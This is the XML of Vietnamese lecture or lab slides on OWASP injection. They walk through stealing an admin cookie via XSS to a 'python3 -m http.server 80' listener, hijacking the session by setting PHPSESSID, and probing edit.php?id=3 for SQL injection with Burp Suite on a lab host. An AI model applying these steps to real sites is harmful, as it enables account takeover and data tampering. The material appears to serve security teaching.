      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F673230D-6F3F-A7A0-FF1B-0DBCDAF1996D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226541" y="1969322"/>
            <a:ext cx="4808357" cy="356764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2500" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A03:2021-Injection (Lỗi chèn): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Mặc dù giảm xuống vị trí thứ ba, đây vẫn là một mối đe dọa lớn. Lỗi chèn mã độc (như SQL Injection và XSS) vẫn là một trong những lỗ hổng phổ biến nhất và nghiêm trọng nhất. Đáng chú ý, lỗ hổng XSS hiện đã được gộp vào danh mục này</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7172" name="Picture 4" descr="OWASP Top 10 security vulnerabilities 2021 Evalian®">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C6F131D-D60B-04F6-16AB-C79E0EB89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20294"/>
            <a:ext cx="3923030" cy="385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8432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C40B1-DE1F-97D6-DEF1-B4D3541F719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A107C14-29F6-E149-CC7A-963E2EEC465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7AA36501-4286-3199-7D9D-7DC820A7BB7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190</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4F79131-1084-9442-769E-BE8EB8A1FAC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Bước 2: Tấn công XSS để lấy Cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C12DF27-B666-4938-61F6-22F09FBE83A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1257300"/>
            <a:ext cx="9131815" cy="3597853"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5324509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AA0AA-02C2-E1E7-4CAB-D96083F7689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6B96998-3987-6877-0ACB-96E6FAF746C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20999BE-3A7D-E171-0856-2448D6EC052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191</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DB1611E-3D25-DB5F-2145-6E5A08F483B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>
            <a:ext cx="8915400" cy="113107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Bước 2: Tấn công XSS để lấy Cooki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
          </a:p>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python3 –m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>http.server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> 80:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09E561FD-3EFA-2AD4-24C2-94D4D32B7878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-119956" y="1747920"/>
            <a:ext cx="9383912" cy="2819397"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2537360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754B9-16C3-E86B-036F-858D2A79BDD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9D6BFC5-B702-5C68-8903-EE8FC746A3D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9FB66F3-738B-4C5F-E03E-0B79F8AFD1D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192</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B765DF71-9E90-9A20-4277-6CEF9ED997FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Bước 3: Chiếm quyền phiên làm việc (Session Hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tại trang web, right-click và chọn Impect(Q)  để kiểm tra thông tin trang web</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7CAE243-CCFC-A001-059D-354CF2011BCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="337292" y="1701611"/>
            <a:ext cx="8469416" cy="4026089"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2976904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4F19B-7F19-8609-A287-F43364D4BF7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0541AAA-592D-825F-FD43-B23AFA234A94}"/>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0096B59-F7CC-6245-96A2-F100BCC00FB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193</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{483ECC49-FFFE-3783-C3B8-A2094D310047}"/>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Đ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ổi Name thành PHPSESSID và Value thành giá trị PHPSESSID vừa bắt được từ Terminal</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09AABDA9-5D2A-9EB7-6107-F69F82B7295A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="18118" y="1297571"/>
            <a:ext cx="8973482" cy="4417429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219773320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D7098-6391-9411-4342-5FB89EBE52C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015E86-C412-AFA4-5103-B22F2AC4B171}"/>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7ABFED4-7FB8-64FB-C4E0-73B5BBF2E22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194</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3286A70C-B17B-3DFB-851A-256C81BC4588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Sau khi Enter, load lại trang thì Attacker đã có thể truy cập được trang quản lý của administrator và có toàn quyền thêm xóa sửa dữ liệu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13BEFD16-F43E-A971-4423-365B810166C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1597211"/>
            <a:ext cx="9029700" cy="4117789"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="487308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EE12B-D01A-993D-C51A-6F12255C127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CDF0411-4D2A-B651-325A-6584585D344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EBE0D94-6772-93A2-4A06-2E1A4220325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195</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E74828D8-2D63-A20C-F787-951C7E0FBD2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="668662"/>
            <a:ext cx="9242133" cy="4377675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4953407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4C41-07CB-95CA-AF6D-B2E5274EE19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86A74CA-B90B-154E-4127-0E42CB24208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51678DE-1DD7-966E-202F-3EE0E1AB6D5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196</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{141FE417-6375-302D-1F44-C2626C7B737D}"/>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Thao tác thêm xóa sửa hoàn toàn hoạt động tốt, cho thấy quyền admin đã hoạt động đúng.</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73EA8B28-1E2D-88AE-FA32-5584FBB97ED8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="99695" y="1314235"/>
            <a:ext cx="8960877" cy="3905464"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35265232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5AA99-2BA6-9C38-8085-F28536334C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32EC7B9-FFA5-DC8C-FF31-AD69C7E4B46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B228635E-E228-A76E-EDCD-45CCEAB1F6E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197</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80AD1D6A-1CE0-E750-23E4-5D8E085353CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>
            <a:ext cx="8915400" cy="2413480"/>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Trên thanh địa chỉ mặc định là cho thao tác sửa record này có đường dẫn là 192.168.164.132/admin/edit.php?id=3. Ta kiểm tra thử thêm 1 dấu nháy đơn (‘) xem có lỗi không nếu có chúng tỏ câu lệnh sẽ có dạng:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9041073-BE9D-E277-137F-F3FF1B5B5416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="2898066"/>
            <a:ext cx="6096000" cy="2188308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="918141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7E48-B197-295F-AC40-C9132CC957C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E549BAE-8A58-80F6-737B-5E1F2059284C}"/>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F818C63-E026-1434-EDA2-CEA45A8997B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198</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2C6C1E8-2DA5-350A-FF96-54BB2A3D690C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Sau khi load lại trang web ta có 1 các thông báo lỗi khả nghi có thể khai thác như hình. Ngoài lỗi sql ta còn có 1 đường dẫn khả nghi có thể khai thác như “/var/www/admin/edit.php on line 19”. </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ED6970E3-2A96-50CB-BCB2-294155E01895}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2155038"/>
            <a:ext cx="8915400" cy="3722974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23494079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8C650-9934-316D-7892-EC1E7B7F030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FAE346B-0D6E-DA45-59C2-81934AAFC9E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E80142F2-F48A-EDCB-58D9-8AB16C2ADCB3}"/>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199</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5B17BCA-ED94-5D69-17D9-3461FD6317AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Burp Suite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ngăn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chặn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chỉnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sửa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>gói</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> tin. Tiến </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>năng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Inrecept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> on.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mở</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
